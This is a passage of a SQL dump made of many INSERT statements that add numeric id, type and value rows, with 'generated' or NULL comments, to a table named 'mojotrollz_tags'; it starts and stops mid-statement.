`mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14857, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14859, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14859, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14859, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14859, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14859, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14860, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14860, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14861, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14861, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14862, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14864, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14864, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14865, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14865, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14866, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14866, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14867, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14867, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14868, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14868, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14869, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14869, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14871, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14871, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14872, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14872, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14872, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14872, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14872, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14873, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14873, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14873, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14873, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14873, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14874, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14874, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14874, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14874, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14874, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14875, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14875, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14876, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14876, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14877, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14878, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14879, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14880, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14880, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14880, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14881, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14881, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14881, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14882, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14882, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14882, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14883, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14883, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14883, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14884, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14887, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14887, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14888, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14888, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14889, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14889, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14890, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14890, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14892, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14892, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14892, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14892, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14892, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14893, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14893, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14893, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14893, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14893, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14894, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14894, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14894, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14894, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14894, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14901, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14901, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14901, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14901, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14901, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14902, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14902, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14903, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14903, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14904, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14904, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14905, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14905, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14908, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14908, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14908, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14908, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14908, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14909, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14909, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14909, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14909, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14909, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14910, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14910, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14911, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14911, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14912, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14912, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14921, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14921, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14941, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14942, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14942, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14942, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14942, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14942, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14942, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14943, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14943, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14943, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14944, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14945, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14946, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14946, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14946, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14947, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14948, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14961, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14961, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14962, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14962, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14963, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14963, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14964, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14964, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14964, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14964, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14964, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14965, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14966, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14967, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14968, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14981, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14981, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14982, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14982, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14983, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14983, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14984, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14984, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14986, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14987, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14988, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14989, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14990, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14990, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14991, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14991, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14994, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14994, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15001, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15002, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15003, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15004, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15005, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15006, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15006, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15006, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15006, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15006, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15006, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15007, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15007, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15007, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15007, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15007, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15008, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15008, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15009, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15010, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15011, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15011, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15012, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15012, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15021, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15021, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15022, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15022, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15041, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15042, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15042, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15042, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15043, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15043, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15043, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15045, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15046, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15047, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15061, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15062, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15063, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15064, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15065, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15066, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15067, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15067, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15067, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15068, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15069, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15070, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15070, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15071, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15072, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15073, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15074, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15075, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15076, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15076, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15077, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15077, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15078, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15078, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15079, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15079, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15080, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15080, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15082, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15083, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15084, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15085, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15086, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15087, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15088, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15089, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15090, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15091, 